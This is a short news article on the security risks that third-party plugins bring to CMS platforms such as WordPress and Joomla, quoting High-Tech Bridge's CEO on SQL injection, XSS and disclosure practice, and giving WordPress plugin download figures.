A large proportion of websites are not standalone sites in their own right, but creations based on CMSs such as Drupal, WordPress, and Joomla. This is particularly true for personal blogs, but using a CMS as the basis for a site has been increasingly popular among larger companies. CMSs are used because they allow for articles to be posted easily, make it simple for multiple people to contribute to a site, and allow for different users to be assigned different access rights. They can also be extended through the use of plugins, but these self-same extensions are also a security disaster waiting to happen.
Security experts High-Tech Bridge frequently discover vulnerabilities in extensions and plugins for popular CMSs. It is standard procedure to notify the developer before going public three weeks after the discovery — this provides an opportunity for the problems to be fixed without alerting others who might exploit it. High-Tech Bridge CEO, Ilia Kolochenko, says that CMS security issues are nothing new:
“For upwards of a decade the major CMS platforms such as Joomla and WordPress have been deeply researched by both black and white hat hackers. In the early days SQL injections and code execution flaws were commonplace. In fact, around 90 percent of websites were vulnerable to critical-risk attacks permitting to take control over the website remotely within a dozen of minutes”.
A great deal of work has been put into ensuring that CMSs are secure out of the box, leading Kolochenko to say, “I would say that a popular CMS, such as WordPress or Joomla may be considered secure in default installation if they are properly configured, donâ€™t have third-party code and are up to date”.
But therein lies the rub. Start to add extensions into the mix, and it’s a very different story. High Tech Bridge points out that many plugins are written by inexperienced coders who lack the skills to ensure security. Of course, there are very few vanilla CMS installations out there in the wild — few people are able to find a CMS that offers all they need without a little help from third-parties. The security flaw in plugins can be at least as serious as any that may have existed in the CMSs themselves in the past. “By exploiting XSS and SQLi flaws in the plugins, the attacker can get at the admin password same as if he were exploiting these vulnerabilities in the core code of the web application”.
With a staggering 33,621 plugins downloaded a total of 749,138,518 times in the case of WordPress, the impact of exploiting security vulnerabilities could be huge.